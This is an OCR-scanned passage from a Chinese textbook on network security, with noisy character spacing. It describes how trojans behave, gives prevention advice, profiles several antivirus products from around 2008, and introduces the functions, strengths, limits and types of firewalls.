它 是 一 个 当 系 统 启动 时 即 自动 运行 的 程序 ， 因 此 必须 潜入 计算 机 的 启动 配置 文件 中 ， 
如 win.ini、system.ini 以 及 启动 组 等 文件 。 

3) ”欺骗 性 

木马 程序 要 达到 其 长 期 隐蔽 的 目的 ， 就 必须 借助 系统 中 已 有 的 文件 。 其 经 常 使 用 的 是 
常见 的 文件 名 或 扩展 名 ， 或 者 仿制 一 些 不 易 被 人 区 别 的 文件 名 ， 更 有 甚 者 干脆 就 借用 系统 
文件 中 已 有 的 文件 名 ， 只 不 过 将 它 保 存在 不 同 路 径 之 中 。 还 有 的 木马 程序 为 了 隐藏 自己 ， 
把 自己 设置 成 一 个 ZIP 文件 类 型 图 标 ， 当 不 小 心 打 开 它 时 ， 它 就 马上 运行 。 

4) 自动 恢复 

现在 很 多 的 木马 程序 中 的 功能 模块 已 不 再 是 由 单一 的 文件 组 成 ， 而 是 具有 多 重 备份 ， 
可 以 相互 恢复 。 

5) ”自动 打开 端口 

木马 程序 潜入 计算 机 之 中 的 目的 不 只 是 为 了 破坏 系统 ， 更 是 为 了 获取 系统 中 有 用 的 信 
息 。 当 客户 上 网 时 与 远 端 客户 进行 通信 ， 木 马 程序 就 会 用 服务 器 /客户 端的 通信 手段 把 信息 
告诉 黑客 们 ， 以 便 控制 客户 的 计算 机 ,或 实施 进一步 入 侵 企 图 。 根据 TCP/IP 协议 , 每 台 计 
算 机 可 以 有 256x256 扇 门 ， 也 即 从 0 一 65535 号 门 。 

6) ”功能 的 特殊 性 

通常 的 木马 功能 都 是 十 分 特殊 的 ， 除 了 普通 的 文件 操作 以 外 ， 还 具有 搜索 cache 中 的 
口令 、 设 置 口令 、 扫 描 目标 计算 机 的 IP 地址 、 进 行 键盘 记录 、 远 程 注册 表 的 操作 以 及 锁定 
鼠标 等 功能 。 

4. 防范 木马 病毒 的 安全 建议 


(1) 使 用 正版 的 杀毒 软件 和 防火 墙 产品 ， 并 对 杀毒 软件 和 防火 墙 进行 合理 配置 。 

(2) 使 用 工具 软件 隐藏 本 机 的 真实 了 P 地 址 。 

(3) 注意 电子 邮件 安全 ， 尽 量 不 要 在 网 络 中 公开 自己 关键 的 邮箱 地 址 ， 不 要 打开 陌生 
地 址 发 来 的 电子 邮件 ， 更 不 要 在 没有 采取 任何 安全 措施 的 情况 下 下 载 或 打开 邮件 的 附件 。 

(4) 在 使 用 即时 通讯 软件 时 ， 不 要 轻易 运行 “朋友 ”发 来 的 程序 或 链接 。 对 从 网 络 上 
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下 载 的 任何 程序 都 使 用 杀毒 软件 或 木马 诊断 软件 进行 查 杀 ， 确 认 安 全 后 再 运行 。 

(5) 尽量 少 浏览 和 访问 个 人 网 站 。 

(6) 不 用 隐藏 文件 的 扩展 名 。 

(7) 定期 检查 计算 机 的 启动 配置 ， 热 悉 每 一 个 配置 对 应 的 文件 ， 一 旦 发 现 没 见 过 的 启 
动 项 ， 要 立即 检查 是 否 是 病毒 建立 的 。 

(8) 定期 检查 系统 服务 管理 器 中 的 服务 ， 检 查 是 否 有 病毒 新 建 的 服务 进程 。 定 期 检查 
系统 进程 ， 查 看 是 否 有 可 疑 的 进程 。 

(9) 根据 文件 创建 日 期 定期 检查 系统 目录 下 是 否 有 近期 新 建 的 可 执行 文件 ， 如 果 有 的 
话 ， 很 可 能 是 病毒 文件 。 


4.3 反 病 毒 产品 及 解决 方案 


4.3.1 主流 反 病毒 产品 特点 介绍 
1. 卡巴 斯 基 杀 毒 软件 


Kaspersky Labs 建立 于 1997 年 ， 是 国际 著名 的 信息 安全 领导 厂商 ， 总 部 设 在 俄罗斯 首 
都 莫斯科 。 公 司 为 个 人 用 户 、 企 业 网 络 提供 反 病毒 、 防 黑客 和 反 垃圾 邮件 产品 。 经 过 十 余 
年 与 计算 机 病毒 的 斗争 ， 卡 巴 斯 基 获得 了 独特 的 知识 和 技术 ， 成 为 病毒 防卫 的 技术 领导 者 
和 专家 。 

其 针对 家 庭 及 个 人 用 户 推 出 的 最 新 杀毒 软件 产品 
有 如 下 特点 和 功能 。 

1) 产品 亮点 

e ”采用 三 种 保护 技术 防御 新 的 和 未 知 的 威胁 。 每 小 时 自动 更 新 数据 库 ， 预 先行 为 分 

析 ; 正在 进行 的 行为 分 析 。 

。 防御 病毒 ， 包 括 木 马 和 蠕虫 。 

。 ”防御 间谍 软件 和 广告 程序 。 
e ”实时 扫描 邮件 、 网 络 通 信和 文件 中 的 病毒 。 
e。 ”使 用 ICQ 和 其 他 IM 客户 端 实 时 防御 病毒 。 
四 
. 
四 


卡巴 斯 基 @ 反 病毒 7.0 单机 版 , 具 


防御 所 有 类 型 的 键盘 记录 器 。 
检测 所 有 类 型 的 rootkits。 
自动 更 新 数据 库 。 
2) ”附加 功能 
。 计算 机 被 更 改 后 ， 可 以 恢复 。 
e ”自我 保护 功能 可 以 防御 反 病毒 程序 被 禁用 或 停 用 。 
。 ”创建 应 急 磁 盘 工 具 。 
。 ”免费 技术 支持 。 
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2. McAfee 杀毒 软件 


NAI(Network Associates，INC 美国 网 络 联盟 )， 是 全 球 第 五 大 软件 公司 ， 成 立 于 1989 
年 ， 其 前 身 McAfee Associates 是 业界 最 著名 的 反 病毒 安全 厂商 。 作 为 目前 世界 上 一 家 能 够 
为 企业 提供 全 面 网 络 安全 解决 方案 的 厂商 ，NAI 在 全 球 五 大 洲 建立 并 拥有 800 多 名 病毒 研 
究 专 家 组 成 的 反 病 毒 紧 急 响 应 小 组 (AVERT)， 是 目前 世界 范围 内 最 权威 的 病毒 防范 手段 发 
布 组 织 ， 以 每 10 分 钟 就 在 NAI 站 点 更 新 一 次 病毒 特征 文件 的 速度 ， 为 用 户 提供 每 周 7 天 、 
每 天 24 小 时 的 技术 支持 , 使 用 户 在 最 短 的 时 间 内 查 杀 最 新 病毒 。 在 业界 的 防 病毒 系列 解决 
方案 中 ， 只 有 McAfee 可 以 达到 最 高 级 别 的 检测 率 。 目 前 ，《 财 富 》 排 名 前 1000 位 的 企业 
有 80% 的 企业 采用 McAfee 作为 自己 的 “保护 神 ”。 
VirusScan@ Plus 的 优势 和 功能 如 下 。 
1) 六合 一 的 预防 与 保护 
e ”安全 搜索 ， 安 全 冲浪 。 为 网 站 添加 评级 ， 帮 助 您 避 开 网 上 的 危险 。 
。 ”家 庭 许 可 订购 服务 。 自 动 将 最 新 的 软件 功能 和 威胁 更 新 传递 给 您 ， 让 您 能 够 轻松 
管理 所 有 PC 的 安全 订购 。 
。 阻止 病毒 。 拦 截 和 删除 病毒 ， 甚 至 可 以 在 病毒 到 达 您 的 PC 之 前 加 以 阻止。 
。 ”拦截 黑客 。 保 护 您 的 计算 机 ， 使 黑客 无 法 发 现 您 的 计算 机 。 
。 ”拦截 间谍 软件 。 在 间谍 软件 尚未 安装 于 计算 机 上 时 加 以 阻止 ， 同 时 删除 现 有 的 间 
谍 软 件 。 
。 ”改善 PC 健康 状况 。 清 理 您 的 计算 机 ， 使 其 保持 健康 和 安全 。 
2) ”其 他 优势 
e。 ”为 您 量 身 定做 。 使 用 新 的 McAfee@ SecurityCenter™ 扫描 您 的 计算 机 、 检 查 更 新 
以 及 配置 安全 设置 。 这 个 简单 易 用 的 “控制 台 ” 让 您 只 需 点 击 一 次 即 可 访问 计算 
机 的 安全 信息 。 
。 ”始终 打开 ， 时 刻 防护 。McAfee® Avert® Labs 提供 的 全 天 候 病毒 和 威胁 防护 功能 
会 持续 监视 全 球 范围 的 病毒 活动 ， 并 提供 快速 的 病毒 防护 和 删除 解决 方案 。 
e ”时 刻 升级 ， 时 刻 更 新 。 自 动 安装 每 日 更 新 。 如 果 有 新 的 版 本 ， 您 可 以 自动 且 免 费 
获得 ， 确 保 您 始终 具备 最 新 的 保护 。 
e ”便捷 、 持 续 的 保护 。McAfee 提供 很 多 续 订 选项 ， 使 您 可 以 获得 McAfee 的 最 新 
保护 。 
。 ”真正 的 专家 ,真诚 的 帮助 。 通过 Intermet 聊天 、 电 子 邮 件 和 电话 获得 McAfee 的 
计算 机 安全 专家 提供 的 支持 。 
3. 诺顿 杀毒 软件 
作为 信息 安全 领域 的 全 球 领先 厂商 ， 赛 门 铁 克 公 司 为 个 人 、 中 小 企业 以 及 大 型 企业 用 
户 提 供 全 面 广泛 的 软件 、 设 备 及 服务 ， 以 协助 用 户 对 其 IT 基础 架构 进行 管理 和 安全 防护 。 
赛 门 铁 克 的 诺顿 品牌 是 个 人 用 户 安全 和 解决 方案 领域 的 全 球 零 售 市 场 领 导 者 。 
具体 的 产品 及 功能 如 表 4-2 所 示 。 
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表 4-2 诺顿 产品 比较 


产品 Norton AntiVirus | Norton Internet 
功能 2008 Security 2008 
阻止 黑客 访问 您 的 计算 机 Y 
防止 未 知 威胁 攻击 您 的 PC 
杀 除 电 子 邮 件 和 即时 消息 中 的 病毒 
在 入 口 处 阻截 互联 网 蠕虫 
阻止 间谍 软件 跟踪 您 的 在 线 活动 
防止 间谍 软件 攻击 您 的 计算 机 
防御 在 线 身份 信息 遭 到 窃取 
对 网 站 进行 检查 以 确保 其 真实 性 
消除 所 下 载 文件 中 的 危险 威胁 V 
阻截 可 疑 程序 
只 允许 授权 的 程序 与 互联 网 建立 连接 
确保 珍贵 资料 在 发 生计 算 机 灾难 时 完好 无 损 
恢复 受 损 或 已 删除 的 文件 和 文件 夹 


享受 安全 在 线 存储 服务 | | 


Norton 360 


| 


查找 并 修复 致使 计算 机 速度 下 降 的 问题 
删除 令 人 厌烦 的 互联 网 干扰 文件 和 临时 文件 
4. 趋势 杀毒 软件 
趋势 名 列 全 球 1000 强 企 业 ， 世 界 第 二 ， 亚 洲 第 一 。2001 年 7 月 进入 中 国 。 它 是 网 络 
安全 软件 及 服务 领域 的 全 球 领导 者 ， 几 年 前 就 以 车 越 的 前 瞻 和 技术 革新 能 力 引领 了 从 桌面 
防毒 到 网 络 服务 器 和 网 关 防毒 的 潮流 ， 总 部 位 于 日 本 东京 和 美国 硅谷 ( 搬 至 新 加 坡 )， 目 前 
在 26 个 国家 和 地 区 设 有 分 公司 ， 员 工 总 数 超过 2000 人 。2007 年 全 球 营业 收入 接近 5 亿美 


Re 


前 。 元 ， 是 一 家 高 成 长 性 的 路 国信 息 安全 软件 公司 。 
高 趋势 科技 网 络 安全 专家 2008(TIS) 的 功能 特点 如 下 。 
号 。 “个 人 帐号 信息 防 窗 。 
硒 。 ”主动 式 防御 。 
人 。 双向 主 控 式 防火 墙 。 
材 。 ”家 长 控制 管理 。 
计 。 ”广告 诈骗 邮件 过 滤 。 
浊 。 ”强劲 木马 查 杀 。 
和 。 无线 网 络 监控 。 
。 ”综合 病毒 防治 。 
。 网络 钓 鱼 诈骗 识别 。 


。 ” 防 间 谍 软件 和 rootkit。 
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5. KV 杀毒 软件 


江 民 
络 反 病 毒 
江 民 
户 排 忧 解 
引领 中 国 
江 民 
推出 的 计 
杀毒 软件 
扫描 速度 


新 科技 术 有 限 公司 (简称 江 民 科技 ) 成 立 于 1996 年 ， 研 发 和 经 营 范围 涉及 单机 和 网 
软件 、 黑 客 防火 墙 、 邮 件 服务 器 防 病毒 软件 等 一 系列 信息 安全 产品 。 

反 病 毒 技 术 已 经 有 10 余年 的 积淀 ， 经 验 丰富 ， 多 次 第 一 时 间 解 除 重大 病毒 ， 为 用 
难 。 江 民 科 技 在 反 病 毒 领域 锐意 进取 ， 长 期 致力 于 新 技术 的 研发 ， 不 断 推陈出新 ， 
反 病 毒 技 术 发 展 的 新 潮流 。 

杀毒 软件 KV2008 是 江 民 反 病毒 专家 团队 针对 网 络 安全 面临 的 新 课题 ， 全 新 研发 
算 机 反 病毒 与 网 络 安全 防护 软件 ， 是 全 球 首 家 具有 灾难 恢复 功能 的 智能 主动 防御 
。 江 民 杀 毒 软件 KV2008 采用 了 新 一 代 智能 分 级 高 速 杀 毒 引擎 ， 占 用 系统 资源 少 ， 
得 到 了 大 幅 提 升 ， 突 破 了 “灾难 恢复 ”和 “病毒 免 杀 ” 两 大 世界 性 难题 。 新 品 在 


KV2007 的 基础 上 新 增 三 大 技术 和 五 项 新 功能 ， 更 在 人 机 对 话 友好 性 和 易 用 性 上 下 足 功夫 


可 有 效 防 
知 病毒 。 


杀 计 算 机 病毒 、 木 马 、 网 页 恶意 脚本 、 后 门 黑客 程序 等 恶意 代码 以 及 绝 大 部 分 未 


6. 瑞星 杀毒 软件 


北京 
机 反 病 毒 
供 全 系列 
构 提 供 全 
作为 
营销 、 服 
全 部 自 有 
瑞星 


瑞星 科技 股份 有 限 公司 成 立 于 1998 年 4 月， 公司 以 研究 、 开 发 、 生 产 及 销售 计算 
产品 、 网 络 安全 产品 和 黑客 防治 产品 为 主 ， 是 中 国 最 早 ， 也 是 中 国 最 大 的 能 够 提 
产品 的 专业 厂商 ， 软 件 产品 全 部 拥有 自主 知识 产权 ， 能 够 为 个 人 、 企 业 和 政府 机 
面 的 信息 安全 解决 方案 。 

国内 最 大 的 反 病 毒 专业 企业 ， 瑞 星 公司 已 经 建成 国内 最 具 竞 争 力 的 研究 、 开 发 、 
务 网 络 。 公 司 拥有 国内 最 大 、 最 具 实力 的 反 病 毒 研发 队伍 ， 这 使 得 瑞星 公司 拥有 
知识 产权 的 核心 技术 ， 拥 有 六 项 专利 技术 ， 并 且 进 行 着 多 项 前 沿 研究 项 目 。 
杀毒 软件 2008 单机 版 的 功能 特点 如 下 。 

新 增 安全 检测 功能 ， 对 操作 系统 进行 全 面 检查 ， 帮 助 用 户 直观 地 发 现 系统 中 存在 
的 漏洞 ， 从 而 可 以 加 固 系统 、 弥 补漏 洞 ， 提 高 系统 的 健壮 性 和 稳定 性 。 

除 对 已 知 病毒 进行 快速 查 杀 外 ， 还 可 以 对 大 量 未 知 病毒 、 恶 意 程序 进行 检测 和 查 
杀 ， 对 奖 固 的 病毒 可 以 采用 强 杀 手段 ， 对 通过 下 载 软件 、 即 时 通信 工具 传输 的 文 
件 自动 进行 病毒 扫描 。 

对 实时 监控 系统 做 了 重大 改进 , 采用 三 层 主动 防御 策略 , 能 够 主动 防御 未 知 病毒 ， 
有 效 抵御 各 种 网 络 威胁 的 入 侵 ， 智 能 化 、 人 性 化 的 安全 策略 ， 大 大 减少 用 户 对 危 
险 行为 的 判定 。 

瑞星 杀毒 软件 2008 版 专门 针对 网 络 游戏 、 股 票 软件 、 即 时 通信 工具 、 网 上 银行 客 
户 端 软件 等 设计 了 帐号 保险 柜 功能 ， 可 以 保护 各 种 网 络 游戏 、 即 时 通信 工具 、 网 
上 银行 客户 端 软 件 等 网 络 应 用 的 帐号 、 密 码 ， 阻 止 木马 盗窃 及 侵害 。 

瑞星 杀毒 软件 2008 版 最 新 提供 “即时 升级 ”服务 ， 软 件 自 动 检测 最 新 版 本 、 自 动 
升级 ， 瑞 星 公司 每 天 提供 不 少 于 3 次 的 即时 升级 服务 。 
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4.3.2 反 病 毒 安全 体系 的 建立 


随 着 信息 时 代 的 到 来 ， 人 们 的 工作 越 来 越 多 地 依赖 于 计算 机 完成 ， 在 计算 机 中 存储 了 
大 量 的 重要 数据 。 对 于 这 些 重要 的 数据 ， 我 们 需要 建立 起 一 套 完善 的 病毒 防御 体系 来 进行 
保护 。 
信息 安全 体系 的 建立 不 仅 需 要 先进 的 反 病毒 技术 ， 而 且 也 需要 严格 的 安全 管理 、 法 律 
约束 和 安全 教育 等 。 我 们 形象 地 用 下 列 公式 来 描述 : 
信息 安全 体系 = 法 律 + 意识 + 技术 + 管理 + 技能 
。 ”制定 严格 的 法 律 、 法 规 。 计 算 机 网 络 是 一 种 新 生 事物 ， 它 的 许多 行为 无 法 可 依 ， 
无 章 可 循 ， 导 致 网 络 犯罪 处 于 无 序 状态 。 面 对 日 趋 严 重 的 网 络 犯罪 ， 必 须 建立 与 
网 络 安全 相关 的 法 律 、 法 规 ， 使 非法 分 子 慑 于 法 律 ， 不 敢 轻 举 亡 动 。 
。 ”计算 机 病毒 的 防范 不 仅 是 一 个 技术 问题 ， 也 是 一 个 意识 问题 。 如 果 你 拥有 一 套 很 
好 的 装备 和 武器 ， 但 却 不 知道 如 何 利 用 它 ， 或 者 没有 把 它 的 能 量 和 功能 发 挥 到 最 
大 ， 那 么 获得 的 效果 自然 就 会 大 打折 扣 。 
。 ”先进 的 信息 安全 技术 是 网 络 安全 的 根本 保证 。 用 户 对 自身 面临 的 威胁 进行 风险 评 
估 ， 决 定 其 所 需要 的 安全 服务 种 类 ， 选 择 相应 的 安全 机 制 ， 然 后 集成 先进 的 安全 
技术 ， 形 成 一 个 全 方位 的 安全 系统 。 
。 ”严格 的 安全 管理 。 各 计算 机 网 络 使 用 机 构 ， 企 业 和 单位 应 建立 相应 的 网 络 安 全 管 
理 办 法 ， 加 强 内 部 管理 ， 建 立 合适 的 网 络 安全 管理 系统 ， 加 强 用 户 管理 和 授权 管 
理 ， 建 立 安全 审计 和 跟踪 体系 ， 提 高 整体 网 络 安全 意识 。 
。 ”对 计算 机 病毒 基本 防范 技能 的 掌握 是 有 效 防范 病毒 入 侵 的 必要 和 手段。 病毒 防范 的 
- 些 基 础 技能 是 必须 要 掌握 的 ， 如 杀毒 软件 的 基本 功能 的 使 用 ， 某 些 典 型 病毒 的 
防范 技巧 等 。 这 些 技能 的 获得 可 以 依靠 平时 的 积累 和 培训 ， 也 可 以 请 专业 的 反 病 
毒 公司 进行 指导 。 
信息 安全 体系 的 建立 是 一 项 系统 工程 ， 需 要 社会 各 界 的 广泛 关注 和 相关 人 员 的 密切 配 
合 。 我 们 建议 在 根据 企业 自身 环境 选择 杀毒 软件 产品 的 同时 ， 还 要 在 企业 内 部 宣传 、 普 及 
互联 网 法 律 、 法 规 ， 使 员工 知 法 守法 ， 自 觉 遵守 信息 安全 的 规章 制度 。 对 员工 进行 病毒 基 
础 知识 和 病毒 防范 技能 的 培训 ， 加 强 员工 的 防 病毒 意识 和 病毒 查 杀 技能 。 
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第 5 章 防火墙 技 术 


本 章 要 点 

防火 墙 的 概念 、 类 型 与 作用 
防火 墙 的 主要 技术 

基于 防火 墙 的 安全 网 络 结构 
常用 防火 墙 的 选择 


5.1 防火 墙 的 基本 概念 与 分 类 


本 意 上 的 防火 墙 是 指 建筑 物 中 用 于 防止 火灾 从 大 厦 的 一 部 分 传播 到 另 一 部 分 所 设置 的 
隔离 带 。 也 就 是 说 ， 防 火 墙 的 原意 是 指 在 容易 发 生火 灾 的 区 域 与 拟 保护 的 区 域 之 间 设 置 的 
- 堵 墙 ， 将 火灾 隔离 在 保护 区 之 外 ， 保 证 拟 保护 区 内 的 安全 。 

在 网 络 中 ， 所 谓 “ 防 火 墙 ”， 是 指 一 种 将 内 部 网 和 公众 访问 网 (如 Internet) 分 开 的 方法 ， 
它 实 际 上 是 一 种 隔离 技术 。 防 火 墙 是 在 两 个 网 络 通信 时 执行 的 一 种 访问 控制 尺度 ， 它 能 多 
许 你 “同意 ”的 人 和 数据 进入 你 的 网 络 ， 同 时 将 你 “不 同意 ”的 人 和 数据 拒 之 门 外 ， 最 大 
限度 地 阻止 网 络 中 的 黑客 来 访问 你 的 网 络 。 


5.1.1 防火 墙 的 基本 概念 


防火 墙 是 设置 在 不 同 网 络 (如 可 信任 的 企业 内 部 网 和 不 可 信 的 公共 网 ) 或 网 络 安全 域 之 
间 的 一 系列 部 件 的 组 合 。 它 是 不 同 网 络 或 网 络 安全 域 之 间 信息 的 唯一 出 入 口 ， 能 根据 企业 
的 安全 政策 控制 (允许 、 拒 绝 、 监 测 ) 出 入 网 络 的 信息 流 ， 且 本 身 具 有 较 强 的 抗 攻击 能 力 。 


5.1.2 防火墙 的 作用 


在 逻辑 上 ， 防 火 墙 是 一 个 分 离 器 ， 一 个 限制 器 ， 也 是 一 个 分 析 器 ， 有 效 地 监控 了 内 间 
网 和 Internet 之 间 的 任何 活动 ， 保 证 了 内 部 网 络 的 安全 。 

下 面 介绍 防火 墙 的 主要 功能 。 

1. 保护 脆弱 的 服务 

防火 墙 通过 包 过 滤 路 由 器 过 滤 不 安全 的 服务 来 降低 子 网 上 主 系 统 所 冒 的 风险 。 因 为 包 
过 滤 路 由 器 只 允许 经 过 选择 的 协议 通过 防火 墙 ， 因 此 ， 子 网 网 络 环境 可 经 受 较 少 的 外 部 
攻击 。 

例如 ， 防 火 墙 可 以 禁止 某 些 易 受 攻击 的 服务 (如 NFS) 进 入 或 离开 受 保护 的 子 网 。 这 样 
得 到 的 好 处 是 可 以 防护 这 些 服 务 不 会 被 外 部 攻击 者 利用 ， 而 同时 允许 在 大 大 降低 被 外 部 攻 
击 者 利用 的 风险 情况 下 ,使 用 这 些 服 务 ， 从 而 使 对 局 域 网 特别 有 用 的 服务 如 NIS 或 NFS 可 
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得 到 共用 ， 并 减轻 主 系统 的 管理 负担 。 

防火 墙 还 可 以 防护 基于 路 由 选择 的 攻击 ， 如 源 路 由 选择 和 企图 通过 ICMP 改 向 把 发 送 
路 径 转 向 遭受 损害 的 网 点 。 防 火 墙 可 以 排斥 所 有 源 点 发 送 的 包 和 ICMP 改 向 ， 然 后 把 偶发 
事件 通知 管理 人 员 。 

2. 控制 对 系统 的 访问 


防火 墙 可 以 提供 对 系统 的 访问 控制 。 如 允许 从 外 部 访问 某 些 主机 ， 同 时 禁止 访问 另外 
的 主机 。 例 如 ， 防 火 墙 允许 外 部 访问 特定 的 Mail Server 和 Web Server。 

3. 集中 的 安全 管理 

防火 墙 对 企业 内 部 网 实现 集中 的 安全 管理 ， 防 火 墙 定义 的 安全 规则 可 以 运行 于 整个 内 
部 网 络 系统 ， 而 无 须 在 内 部 网 每 台 计算 机 上 分 别 设立 安全 策略 。 防 火 墙 可 以 定义 不 同 的 认 
证 方法 ， 而 不 需要 在 每 台 计 算 机 上 分 别 安装 特定 的 认证 软件 。 外 部 用 户 也 只 需要 经 过 一 次 
认证 即 可 访问 内 部 网 。 

4. 增强 的 保密 性 

保密 对 某 些 网 络 信息 点 是 非常 重要 的 ， 因 为 一 般 被 认为 无 关 大 局 的 信息 实际 上 常 含有 
对 攻击 者 有 用 的 线索 。 使 用 防火 墙 后 ， 某 些 网 络 信息 点 希望 封锁 某 些 服务 ， 如 Finger 和 域 
名 服务 。Finger 显示 有 关 用 户 的 信息 , 如 最 后 注册 时 间 、 邮 件 有 没有 被 访问 等 。 但 是 , Finger 
也 可 能 把 用 户 的 信息 泄露 给 攻击 者 ， 所 以 ， 防 火 墙 系统 不 可 缺少 。 

防火 墙 还 可 以 用 来 封锁 有 关 网 络 信息 点 的 系统 的 DNS 信息 。 因 此 ,网 络 信息 点 的 系统 
名 字 和 IP 地 址 都 不 必 提 供给 Intemet 主 系统 。 在 有 些 网 点 可 以 认为 ， 通 过 封锁 这 种 信息 ， 
可 以 把 对 攻击 者 有 用 的 信息 隐藏 起 来 。 

5. 对 网 络 存 取 和 访问 进行 统计 和 记录 

如 果 所 有 的 访问 都 经 过 防火 墙 ， 那么 ， 防 火 墙 就 能 记录 下 这 些 访问 并 作出 日 志 记录 ， 
同时 也 能 提供 网 络 使 用 情况 的 统计 数据 。 当 发 生 可 疑 动作 时 ， 防 火 墙 能 进行 适当 的 报警 ， 
并 提供 网 络 是 否 受 到 监测 和 攻击 的 详细 信息 。 另 外 ， 收 集 一 个 网 络 的 使 用 和 误 用 情况 也 是 
非常 重要 的 。 首 先 的 理由 是 可 以 清楚 防火 墙 是 否 能 够 抵挡 攻击 者 的 探测 和 攻击 ， 并 且 清 楚 
防火 墙 的 控制 是 否 充足 ,其 次 使 用 统计 对 网 络 需 求 分 析 和 威胁 分 析 等 而 言 也 是 非常 重要 的 。 

6. 策略 执行 

防火 墙 提 供 了 制定 和 执行 网 络 安全 策略 的 手段 。 在 未 设置 防火 墙 时 ， 网 络 安全 取决 于 
每 台 主 机 的 用 户 。 


5.1.3 防火墙 的 优 缺 点 


防火 墙 能 有 效 地 防止 外 来 的 入 侵 ， 它 在 网 络 系统 中 的 优点 如 下 。 
。 ”控制 进出 网 络 的 信息 流向 和 信息 包 。 
。 ”提供 使 用 和 流量 的 日 志和 审计 。 
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。 ”隐藏 内 部 他 地 址 及 网 络 结构 的 细节 。 
尽管 防火 墙 方案 有 上 述 这 些 优点 , 但 它 不 能 解决 所 有 Internet 安全 性 问题 , 因为 其 本 身 
也 存在 许多 缺点 ， 而 且 有 很 多 缺点 是 防火 墙 所 不 能 防护 的 。 


1. 限制 某 些 合乎 需要 的 服务 


防火 墙 最 明显 的 缺点 是 它 可 能 封锁 用 户 所 需 的 某 些 服务 ， 如 Telnet、 FTP、X-Window、 
NFS 等 。 但 这 一 缺点 并 不 是 防火 墙 所 独 有 的 ， 对 主 系统 的 多 级 限制 也 会 产生 这 个 问题 。 一 
个 能 使 安全 性 要 求 同 用 户 需 要 保持 平衡 且 规 划 得 当 的 安全 性 政策 可 以 大 大 有 助 于 解决 与 减 
少 利用 服务 有 关 的 问题 。 

2. 后 门 访问 的 广泛 可 能 性 


防火 墙 不 能 防护 从 后 门 进入 网 络 信息 点 。 例 如 ， 如 果 对 调制 解 调 器 不 加 限制 ， 仍 然 许 
可 访问 由 防火 墙 保护 的 网 络 信 息 点 ， 那 么 ， 攻 击 者 可 以 有 效 地 跳 过 防火 墙 。 调 制 解 调 器 的 
速度 现在 快 到 足以 使 SLIP( 串 行 线 IP) 和 PPP( 点 对 点 协议 ) 切 实 可 行 。 在 受 保护 子 网 内 SLIP 
和 PPP 连接 在 本 质 上 是 另 一 个 网 络 连接 点 和 潜在 的 后 门 。 如 果 人 允许 调制 解 调 器 从 后 门 访问 ， 
那么 ， 前 门 的 防火 墙 就 形同虚设 。 

3. 几乎 不 能 防护 内 部 人 员 的 攻击 

虽然 防火 墙 可 以 用 来 防护 局 外 人 获取 敏感 的 数据 ， 但 它 不 能 防止 内 部 人 员 将 数据 复制 
到 磁带 上 ， 并 把 数据 带 出 。 因 此 ， 认 为 有 了 防火 墙 就 可 以 防护 内 部 人 员 的 攻击 是 错误 的 。 
如 果 忽 略 其 他 窃取 数据 或 攻击 系统 的 手段 ， 把 大 量 资源 存放 在 防火 墙 上 是 不 明智 的 。 

4. 其 他 问题 


(1) 新 的 信息 服务 器 和 客户 机 ， 如 World Wide Web(WWW)、Gopher、WAIS 等 ， 不 
宜 实施 防火 墙 政策 ， 它 们 很 有 可 能 遭 到 数据 驱动 的 攻击 。 因 为 这 些微 机 处 理 的 数据 可 能 包 
含 发 出 的 各 种 指令 ， 而 这 些 指 令 可 能 告诉 攻击 者 更 改 访问 控制 和 主 系统 上 与 安全 有 关 的 重 
要 文件 。 

(2) MBONE: 视频 和 话音 用 多 址 IP 传输 封装 在 其 他 信息 包 内 ， 防 火 墙 一 般 在 不 检查 
包 内 容 的 情况 下 将 这 些 信息 包 转 发 出 去 。 如 果 信 息 包含 有 更 改 安 全 性 控制 措施 并 认可 入 侵 
者 的 命令 的 话 ， 那 么 ， MBONE 传输 就 是 一 种 潜在 的 威胁 。 

(3) 病毒 防火墙 不 能 防止 用 户 从 Intemet 归档 文件 中 下 载 受 病毒 感染 的 PC 机 程序 ， 
或 把 这 些 程序 附加 到 电子 函件 上 传输 出 去 。 由 于 这 些 程序 可 能 以 各 种 方法 编码 或 压缩 ， 因 
而 防火 墙 不 能 精确 地 对 这 些 程序 进行 扫描 来 搜寻 病毒 特征 。 病 毒 问题 仍然 存在 ， 而 且 必须 
用 其 他 政策 和 抗 病毒 控制 措施 进行 处 理 。 

(4) 吞吐 量 : 防火 墙 是 一 种 潜在 的 瓶颈 ， 所 有 的 连接 都 必须 通过 防火 墙 ， 许 多 信息 都 
要 经 过 检查 ， 信 息 的 传递 可 能 要 受到 传输 速率 的 影响 。 

(5) 集中 性 : 防火 墙 系统 把 安全 性 集中 在 一 点 上 ， 而 不 是 把 它 分 布 在 各 系统 间 ， 防 火 
墙 受 损 可 能 会 对 子 网 上 其 他 保护 不 力 的 系统 造成 巨大 的 损害 。 


© 
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5.1.4 ”防火 墙 的 分 类 


如 今 市 场 上 的 防火 墙 林林总总 ， 形 式 多 样 。 有 以 软件 形式 运行 在 普通 计算 机 之 上 的 ， 
也 有 以 固件 形式 设计 在 路 由 器 之 中 的 。 总 的 来 说 可 以 分 为 三 种 : 包 过 滤 防 火 墙 、 代 理 服务 
器 和 状态 监视 器 。 


1. 包 过 滤 防 火 墙 (IP Filting Firewall) 


包 过 滤 (Packet FilteD 是 在 网 络 层 中 对 数据 包 实 施 有 选择 的 通过 ， 依 据 系统 事先 设 定好 
的 过 滤 逻 辑 ， 检 查 数据 流 中 的 每 个 数据 包 ， 根 据 数据 包 的 源 地 址 、 目 标 地址 ， 以 及 包 所 使 
用 端口 确定 是 否 允许 该 类 数据 包 通 过 . 互联 网 就 是 这 样 的 信息 包 交 换 网 络 , 在 这 个 网 络 上 ， 
所 有 往来 的 信息 都 被 分 割 成 许 许多 多 一 定 长 度 的 信息 包 , 包 中 包括 发 送 者 的 IP 地 址 和 接收 
者 的 人 P 地 址 。 当 这 些 包 被 送 上 互联 网 时 ， 路 由 器 会 读 取 接收 者 的 IP 并 选择 一 条 物理 上 的 
线路 发 送出 去 ， 信 息 包 可 能 以 不 同 的 路 线 抵达 目的 地 ， 当 所 有 的 包 抵 达 后 会 在 目的 地 重新 
组 装 还 原 。 包 过 滤 式 的 防火 墙 会 检查 所 有 通过 信息 包 里 的 他 地址， 并 按照 系统 管理 员 所 给 
定 的 过 滤 规 则 过 滤 信 息 包 。 如 果 防 火 墙 设 定 某 一 他 为 危险 的 话 ， 从 这 个 地 址 而 来 的 所 有 信 
息 都 会 被 防火 墙 屏蔽 掉 。 这 种 防火 墙 的 用 法 很 多 ， 比 如 国家 有 关 部 门 可 以 通过 包 过 滤 防 火 
